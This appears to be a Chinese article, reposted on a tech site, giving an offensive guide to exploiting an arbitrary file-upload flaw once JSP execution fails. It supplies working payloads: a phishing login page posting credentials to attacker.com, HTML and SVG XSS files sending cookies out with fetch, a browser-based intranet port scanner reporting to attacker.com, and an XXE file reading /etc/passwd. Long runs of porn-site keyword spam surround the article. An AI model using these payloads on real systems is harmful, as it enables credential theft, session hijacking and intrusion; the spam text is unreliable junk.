精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

任意文件上傳但 JSP 失效?別急,文件上傳還有這些隱藏玩法!

開發(fā) 應(yīng)用安全
目標(biāo)系統(tǒng)存在任意文件上傳漏洞,攻擊者可以上傳任意類型的文件,但仍會有一些問題,那么,此時我們還能做什么呢?以下是完整的實戰(zhàn)指南。

一、漏洞背景

目標(biāo)系統(tǒng)存在任意文件上傳漏洞,攻擊者可以上傳任意類型的文件,包括 .jsp、.html、.js 等。但:

  • .jsp 雖可上傳,但 無法執(zhí)行(可能情況:Web 服務(wù)器不解析 JSP、權(quán)限限制、文件路徑未知等)。
  • 文件真實路徑已知,上傳后文件訪問不解析執(zhí)行。
  • 不能依賴傳統(tǒng)的 WebShell 方式上線或執(zhí)行命令。

那么,此時我們還能做什么呢?以下是完整的實戰(zhàn)指南。

二、核心目標(biāo)

即使無法執(zhí)行服務(wù)器端腳本,任意文件上傳仍具備以下潛力:

  • 信息擴(kuò)大與目標(biāo)偵察
  • 誘導(dǎo)型攻擊(釣魚/社工)
  • 輔助其他漏洞鏈構(gòu)建(如 XSS、LFI、XXE 等)

三、利用方式與可行性分析

1. 上傳 HTML + JS 頁面誘導(dǎo)訪問(釣魚攻擊)

思路: 上傳惡意 HTML 頁面,誘導(dǎo)管理員點(diǎn)擊訪問,執(zhí)行 JS 代碼,實現(xiàn) XSS、信息收集或內(nèi)網(wǎng)探測。

示例:上傳誘導(dǎo)頁面 login.html

<!-- fake_admin_login.html -->
<html>
<body>
<h2>后臺登錄已超時,請重新登錄</h2>
<form action="http://attacker.com/collect" method="POST">
      用戶名:<input name="user"><br>
      密碼:<input type="password" name="pass"><br>
<input type="submit" value="登錄">
</form>
</body>
</html>

利用方式:

  • 上傳該文件,設(shè)為 login.html
  • 發(fā)送釣魚鏈接到管理員或目標(biāo)用戶(如:https://target.com/uploads/login.html)
  • 等待憑據(jù)提交到攻擊者服務(wù)器

2. 注入型 HTML/JS 頁面 -> XSS 腳本執(zhí)行

思路: 上傳帶有 XSS Payload 的 .html, .svg, .js 文件,誘導(dǎo)訪問即觸發(fā)腳本。

示例:xss.html

<html>
<body>
<script>
      fetch("http://attacker.com/collect?cookie=" + document.cookie);
</script>
<h1>加載中...</h1>
</body>
</html>

利用方式:

  • 上傳 xss.html
  • 訪問鏈接誘導(dǎo)管理員點(diǎn)擊(或目標(biāo)系統(tǒng)自動加載 HTML 頁面如日志、圖像、文檔)
  • 自動發(fā)送管理員 Cookie 給攻擊者,實現(xiàn)后臺會話劫持

3. SVG 文件 XSS 利用(繞過限制)

思路: SVG 是合法圖像格式,支持嵌入腳本,可繞過部分上傳限制系統(tǒng)。

示例:xss.svg

<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://attacker.com/log?c='+document.cookie)">
<circle cx="100" cy="100" r="50" fill="blue"/>
</svg>

利用方式:

  • 上傳 xss.svg
  • 如果有“文件預(yù)覽”、“圖像查看”功能,管理員點(diǎn)擊查看時即被觸發(fā)

4. 利用上傳文件進(jìn)行內(nèi)網(wǎng)信息收集(誘導(dǎo)掃描)

思路: 上傳 JS 頁面誘導(dǎo)用戶瀏覽器請求內(nèi)網(wǎng)地址,攻擊者據(jù)此確認(rèn)內(nèi)網(wǎng)結(jié)構(gòu)。

示例:intranet_scan.html

<script>
const ports = [80, 8080, 5000, 8000];
const subnet = "192.168.1.";
for (let i = 1; i <= 254; i++) {
  ports.forEach(port => {
let target = `http://${subnet}${i}:${port}`;
    fetch(target, { mode: 'no-cors' }).then(() => {
      fetch("http://attacker.com/log?host=" + encodeURIComponent(target)); // 結(jié)果返回
    });
  });
}
</script>

利用方式:

  • 誘導(dǎo)管理員或內(nèi)部用戶訪問上傳頁面
  • 瀏覽器觸發(fā)內(nèi)網(wǎng)請求
  • 攻擊者服務(wù)器接收成功請求,獲得內(nèi)網(wǎng) IP 存活資產(chǎn)

5. 惡意 XML / JSON 文件觸發(fā) XXE / 配置注入

思路: 某些系統(tǒng)會解析上傳的 XML/JSON 文件,若未安全配置,可能觸發(fā) XXE 或 JSON 配置注入。

示例:evil.xml

<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM"file:///etc/passwd">
]>
<root>&xxe;</root>

利用方式:

  • 上傳該 XML 文件(如配置文件、報告模板等)
  • 等待系統(tǒng)解析并反饋結(jié)果
  • 若 XXE 存在,攻擊者能獲取服務(wù)器本地文件內(nèi)容

6. 文件覆蓋 / 配置污染(需路徑可控)

思路: 若上傳路徑可控或服務(wù)端目錄結(jié)構(gòu)可探測,嘗試覆蓋配置文件、JS 文件、日志文件等。

比如:

  • 覆蓋 .js 文件供前端加載
  • 覆蓋 Nginx 配置或 Spring YAML 配置(若應(yīng)用會加載上傳的配置)

四、如何獲取文件真實路徑

1. 響應(yīng)內(nèi)容回顯分析

大多數(shù)文件上傳接口在上傳成功后會返回響應(yīng)信息,其中可能包含如下內(nèi)容:

  • 文件的訪問路徑(絕對或相對){"url":"/upload/imgs/abc.jpg"}
  • 存儲路徑或文件名{"filePath":"C:\\web\\uploads\\abc.jsp"}
  • 上傳后的文件名(可用于拼接路徑){"file":"abc.jsp"}

建議:詳細(xì)分析響應(yīng)體中的 JSON、HTML、Headers,尤其是如 url、path、location 字段。

2. 功能頁面自動引用上傳文件

有些上傳功能會直接在前端頁面或后端邏輯中使用上傳的文件,例如:

  • 上傳頭像后,在用戶詳情頁自動加載該圖片
  • 上傳合同后,在某個預(yù)覽地址中通過真實路徑訪問文件
  • 富文本上傳圖片后,在文章編輯區(qū)預(yù)覽

建議:

  • 上傳文件后觀察是否有圖片、音頻、PDF 等自動加載;
  • 監(jiān)聽是否有新請求發(fā)起,URL 中可能就含有真實路徑;
  • 若返回 img src、iframe、object 標(biāo)簽,路徑常嵌入其中。

3. 路徑猜解與探測(信息有限時)

若以上兩種方式都失敗,就只能根據(jù)已有線索猜測路徑或進(jìn)行探測。例如:

(1) 根據(jù)上傳接口的路徑推斷訪問路徑:

  • 上傳接口為 /api/upload/image
  • 通常可猜測訪問路徑可能為 /static/upload/image/xxx.png

(2) 常見路徑規(guī)則嘗試:

  • /uploads/
  • /userfiles/
  • /static/
  • /assets/upload/
  • /files/

(3) 使用目錄掃描工具(如 dirsearch)配合上傳文件名進(jìn)行路徑爆破。

(4) 結(jié)合響應(yīng)文件名構(gòu)造路徑:

  • /upload/abc.jpg
  • /uploads/images/abc.jpg
  • 返回了文件名 abc.jpg,你可以嘗試:

注意:猜測路徑時盡量使用時間戳、UUID、用戶ID等組合邏輯,還可結(jié)合源碼、JS、路徑泄漏等輔助信息。

五、總結(jié)

  • 不要一開始就死磕 .jsp 的執(zhí)行
  • 盡量從業(yè)務(wù)功能角度多思考上傳的文件,如何被使用、包含或處理
  • 善用 HTML + JS 組合的誘導(dǎo)和信息獲取能力
  • 一旦能訪問上傳文件,釣魚 + XSS 是最快獲取權(quán)限的方式之一

利用方式

文件類型

目標(biāo)效果

難度

附加條件

HTML 釣魚/社工

.html

獲取憑據(jù),誘導(dǎo)訪問

?

用戶配合/誘導(dǎo)

JS 掃描腳本

.js

/.html

內(nèi)網(wǎng)探測/信息泄露

??

管理員需訪問

XSS 攻擊

.html

/.svg

打 Cookie,后臺劫持會話

???

瀏覽器解析+誘導(dǎo)點(diǎn)擊

XXE 注入

.xml

讀取服務(wù)器文件

???

服務(wù)端解析器需存在 XXE 漏洞

SVG 繞過上傳限制

.svg

圖像預(yù)覽時觸發(fā)

??

圖像可預(yù)覽/自動渲染

配置覆蓋攻擊

任意

覆蓋 JS/config,污染執(zhí)行點(diǎn)

????

上傳路徑可控

責(zé)任編輯:趙寧寧 來源: 季升安全
相關(guān)推薦

2013-10-31 13:19:06

2009-07-02 13:31:13

JSP組件

2009-07-06 17:11:38

Servlet文件上傳

2009-06-25 15:50:03

Struts2教程上傳任意多個文件

2022-08-11 08:25:58

5G6G運(yùn)營商

2011-12-26 10:17:12

2009-02-04 14:00:59

2025-04-30 08:39:33

SpringMVC接口

2019-03-12 11:06:47

iOS 12AppleiPhone

2009-07-03 17:15:31

jsp上傳文件

2016-12-15 08:28:34

HttpURLConn上傳文件

2022-05-29 08:54:44

Edge瀏覽器

2018-09-13 10:59:30

Redis鍵值存儲

2009-07-06 17:34:20

PEARMail函數(shù)php

2009-08-13 15:18:23

C#文件上傳

2011-12-30 09:49:36

Silverlight

2009-07-14 17:20:31

Webwork文件上傳

2015-04-14 09:46:09

Apple Watch秘密

2025-04-14 10:35:00

for 循環(huán)

2023-11-27 13:19:00

數(shù)據(jù)AI
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

av在线日韩| 国产一二三区在线| 在线日韩电影| 亚洲日本aⅴ片在线观看香蕉| 国产裸体舞一区二区三区| 成人在线二区| 国产成人精品亚洲日本在线桃色 | 五月激情四射婷婷| 久久久久久久久成人| 疯狂欧美牲乱大交777| 亚洲精品一品区二品区三品区| 国产av无码专区亚洲av麻豆| 久久一区中文字幕| 欧美日韩福利视频| 欧美激情亚洲色图| 97成人在线| 欧美亚洲综合另类| 成人网站免费观看入口| 天堂中文а√在线| 97久久超碰国产精品电影| 成人激情春色网| jizz国产在线观看| 精品成人国产| 欧美成人三级视频网站| 黄色片网站免费| 另类春色校园亚洲| 欧美一区二区免费观在线| 好男人www社区| 91av久久| 亚洲最新视频在线观看| 亚洲一区二区三区午夜| 黄色视屏网站在线免费观看| 成人激情小说网站| 亚洲综合av影视| 在线观看av大片| 美日韩精品视频| 78色国产精品| 黄色小视频在线免费看| 欧美一区亚洲| 久久久www成人免费精品| 久久久久亚洲av无码a片| 一本久久青青| 亚洲精品综合精品自拍| 国产精品福利导航| 国产精品45p| 欧美v亚洲v综合ⅴ国产v| 亚洲免费成人在线视频| 亚洲久草在线| 欧美精品成人一区二区三区四区| 久久精品免费网站| 亚洲四虎影院| 欧美日韩在线播放三区四区| 北条麻妃视频在线| 性欧美1819sex性高清| 欧美午夜精品久久久久久人妖| 夜夜添无码一区二区三区| 伦理在线一区| 亚洲福利一区二区三区| 人妻少妇精品无码专区二区| ****av在线网毛片| 精品日本高清在线播放| 免费无码不卡视频在线观看| 亚洲涩涩在线| 欧美在线免费播放| 色噜噜狠狠一区二区| 日本久久一区| 日韩精品一区二区三区中文不卡| 性高潮免费视频| 欧美亚洲国产日韩| 亚洲区一区二区| 国产精品久久久视频| 99国产精品一区二区| 欧美人在线观看| 国产又爽又黄的视频| 久久午夜精品| 国产中文字幕91| 韩国av永久免费| 久久午夜羞羞影院免费观看| 色综合视频二区偷拍在线| 欧洲不卡视频| 亚洲国产aⅴ成人精品无吗| 国产精品宾馆在线精品酒店| 日本另类视频| 日韩天堂在线观看| 在线观看亚洲免费视频| 国产成人一区| 美女av一区二区三区 | 欧美日韩精品在线| 久久久久狠狠高潮亚洲精品| 亚洲国产天堂| 日韩精品视频三区| 91动漫免费网站| 激情欧美日韩| 国产精品一区二区女厕厕| av免费观看网址| 久久午夜电影网| 中国黄色录像片| 欧美大胆性生话| 日韩一区二区三区高清免费看看| 亚洲第九十七页| 希岛爱理av一区二区三区| 韩国日本不卡在线| 国产精品视频久久久久久| 91一区在线观看| 欧美性受黑人性爽| 精品3atv在线视频| 日韩美女视频在线| 免费黄色在线网址| 日韩亚洲在线| 亚洲综合在线小说| 成人av毛片| 五月婷婷激情综合| 日本一二三四区视频| 国产精品三级| 97avcom| 国产精品区在线观看| 国产亚洲欧美一级| 水蜜桃色314在线观看| 成人在线中文| 亚洲女人天堂视频| 日韩欧美亚洲国产| 国产自产视频一区二区三区| 日韩欧美视频一区二区三区四区| 2021中文字幕在线| 日韩欧美一级二级| 小早川怜子一区二区的演员表| 久久一二三区| 日本婷婷久久久久久久久一区二区| 欧美日韩经典丝袜| 91精品国产手机| 懂色av粉嫩av蜜臀av一区二区三区| 美女91精品| 精品一区二区国产| а√在线中文在线新版| 日韩欧美国产电影| 欧美日韩精品一区二区三区视频播放| 喷水一区二区三区| 色就是色欧美| 97成人超碰| 伊人一区二区三区久久精品 | 91麻豆精品91久久久久久清纯| 欧洲性xxxx| 蜜桃av一区二区| 一区二区三区av| 久久国产三级| 日韩中文av在线| 国产精品久久久久久久久毛片 | 亚洲黄色小说图片| 不卡的av网站| www.玖玖玖| 国产精品一区二区三区av麻 | 国产亚洲综合视频| 外国成人在线视频| 欧美中文字幕视频在线观看| 欧美在线一卡| 在线国产电影不卡| 摸摸摸bbb毛毛毛片| 男人操女人的视频在线观看欧美| 亚洲激情图片| 粉嫩一区二区三区在线观看| 欧美成人精品激情在线观看| 亚洲精品国产suv一区| 亚洲电影第三页| www.久久国产| 免费在线看一区| 在线国产伦理一区| 亚洲日本一区二区三区在线| 久久久亚洲国产| 免费一级在线观看播放网址| 欧美日韩中文字幕一区| 日韩国产第一页| 成人国产免费视频| 国产精品亚洲a| 久久久久电影| 国产麻豆日韩| 播放一区二区| 欧美成人免费大片| 久草视频在线看| 7777精品伊人久久久大香线蕉 | 日韩亚洲欧美在线| 日韩精品成人一区| 国产亚洲一区二区三区四区 | 色综合久久久888| 午夜福利理论片在线观看| 欧洲在线/亚洲| 久操免费在线视频| 久久久久久电影| 一起草最新网址| 久久一二三四| 国产成人艳妇aa视频在线| 亚洲97av| 99精品国产高清一区二区| 成人欧美magnet| 久久的精品视频| 你懂的视频在线播放| 日韩三级在线免费观看| 亚洲成熟少妇视频在线观看| 亚洲欧美日韩电影| 中文字幕国产综合| 国产91高潮流白浆在线麻豆| 国产精彩免费视频| 精品91视频| 免费看啪啪网站| 久久最新网址| 久久99精品久久久久久三级| 日韩色性视频| 国产成人精品免高潮在线观看| av网站在线免费| 深夜福利一区二区| 日本不卡视频一区二区| 欧美一区二区三区免费| 波多野结衣电影在线播放| 亚洲成a人片在线观看中文| 日韩激情小视频| 国产农村妇女毛片精品久久麻豆 | 国产在线观看免费播放| 美女视频一区在线观看| 久久久免费视频网站| 国产精品theporn| 在线观看免费黄色片| 欧美精品一区二区三区精品| 精品国产第一页| 日本精品视频| 91在线无精精品一区二区| 成人免费视频观看| 日本一区二区三区在线播放 | 欧美成人69| 亚洲精品国产精品国自产| 国产精品一区二区三区av麻| 久久久久欧美| 亚州综合一区| 你懂的视频在线一区二区| 久久综合五月婷婷| 高清视频一区二区三区| 日韩中文字幕| 147欧美人体大胆444| 999久久久国产999久久久| 国产精品视频内| 亚洲爱爱视频| 国产精品久久久久久久久久三级| 天堂中文av在线资源库| 午夜精品久久久久久久男人的天堂 | 成人av网站免费| 中国xxxx性xxxx产国| 国产高清视频一区| 麻豆传媒在线看| 国产成人精品一区二区三区四区| 中国老熟女重囗味hdxx| 国产精品18久久久久久久久| 麻豆精品国产传媒| 波多野结衣一区二区三区| 亚洲欧美综合视频| 不卡欧美aaaaa| 毛茸茸多毛bbb毛多视频| 91麻豆蜜桃一区二区三区| 中文字幕一二三四区| 久久精品夜色噜噜亚洲a∨| 国产黄色大片免费看| 国产精品激情偷乱一区二区∴| 亚洲不卡在线播放| 亚洲视频在线观看三级| 成年人av电影| 午夜精品在线看| а中文在线天堂| 9191久久久久久久久久久| 精品国产亚洲一区二区麻豆| 亚洲白拍色综合图区| 亚洲人视频在线观看| 国产亚洲欧洲高清| 麻豆传媒视频在线观看免费| 欧美日韩成人在线视频| 蜜桃麻豆影像在线观看| 国产精品欧美激情| av在线亚洲一区| 国内精品久久国产| 成人同人动漫免费观看 | 国产网友自拍视频导航网站在线观看| 久久91亚洲精品中文字幕| 手机在线观看av网站| 国产精品第三页| 欧美视频二区欧美影视| 久99久视频| 亚洲精品成人| 日本精品免费在线观看| 精品中文字幕一区二区 | 国产精品免费看片| 九九视频免费在线观看| 色哟哟国产精品| 99热这里只有精品5| 日韩精品亚洲元码| 欧美69xxx| 欧美一乱一性一交一视频| 4438五月综合| 欧美裸体网站| 自由日本语亚洲人高潮| 国产成人精品无码播放| 国产精品1024久久| a资源在线观看| 亚洲成在人线免费| 91国偷自产中文字幕久久| 亚洲级视频在线观看免费1级| 免费观看在线午夜影视| 日韩美女免费视频| 99re8这里有精品热视频免费| 五月天久久综合网| 亚洲制服av| 在线xxxxx| 亚洲日本成人在线观看| 天天干天天色综合| 亚洲国产日韩欧美在线动漫| 国产精品va在线观看视色| 国产成人精品免费视频| 日韩高清一级| 日本香蕉视频在线观看| 精品无人区卡一卡二卡三乱码免费卡| aaaaa一级片| 亚洲大片一区二区三区| 国产特级黄色片| 日韩在线观看免费av| 成人日韩在线观看| 精品无人乱码一区二区三区的优势 | 欧美电影免费网站| 欧美性受xxxx黑人猛交88| 人人狠狠综合久久亚洲| 久久国产精品无码一级毛片| 亚洲成在人线在线播放| 好吊色一区二区三区| 欧美猛男性生活免费| 在线观看亚洲精品福利片| 亚洲第一导航| 蜜桃一区二区三区四区| 日本污视频网站| 欧美视频在线一区| 国产视频三级在线观看播放| 国产成人精品日本亚洲专区61| 自拍亚洲一区| 青青在线免费观看视频| 国产午夜精品美女毛片视频| 亚洲自拍一区在线观看| 亚洲欧美激情精品一区二区| 天堂中文最新版在线中文| 久久天天狠狠| 视频一区中文字幕| 色屁屁草草影院ccyy.com| 欧美午夜一区二区三区 | 欧美激情精品久久久久久黑人| 国产精品一区二区精品视频观看| 一区二区三区欧美在线| 精品在线播放午夜| 日本精品在线免费观看| 欧美一区二区啪啪| aa在线视频| 国产精品久久久一区二区三区| 亚洲二区在线| 超碰97人人干| 欧美在线免费视屏| 黄色网址视频在线观看| 91久久国产综合久久蜜月精品| 黄色亚洲免费| 青青草福利视频| 欧美日韩成人高清| 日本大胆在线观看| 国产自产在线视频一区| 爽好多水快深点欧美视频| 女人黄色一级片| 91精品欧美久久久久久动漫| 久久电影网站| 欧美另类高清视频在线| 青青草国产精品亚洲专区无| 少妇被躁爽到高潮无码文| 日韩久久久精品| 激情都市亚洲| 91成人在线视频观看| 99视频一区二区三区| 国产污视频网站| 久久资源免费视频| 欧美jizz19性欧美| 天天色综合社区| 亚洲成a人v欧美综合天堂| 九色视频在线播放| 91夜夜未满十八勿入爽爽影院| 亚洲久色影视| 91香蕉视频网| 亚洲精品乱码久久久久久按摩观| 成人看片网站| 精品视频在线观看一区二区| 久久久久久一级片| 99久久精品国产成人一区二区| 91精品国产高清久久久久久91| 久久国产亚洲| 欧美无人区码suv| 欧美精品一二三四| 女人高潮被爽到呻吟在线观看| 中文字幕日韩精品久久| 99久久精品情趣| 精品国产av一区二区三区| 国产精品成av人在线视午夜片| 激情另类综合| 26uuu成人网| 中文字幕日韩欧美|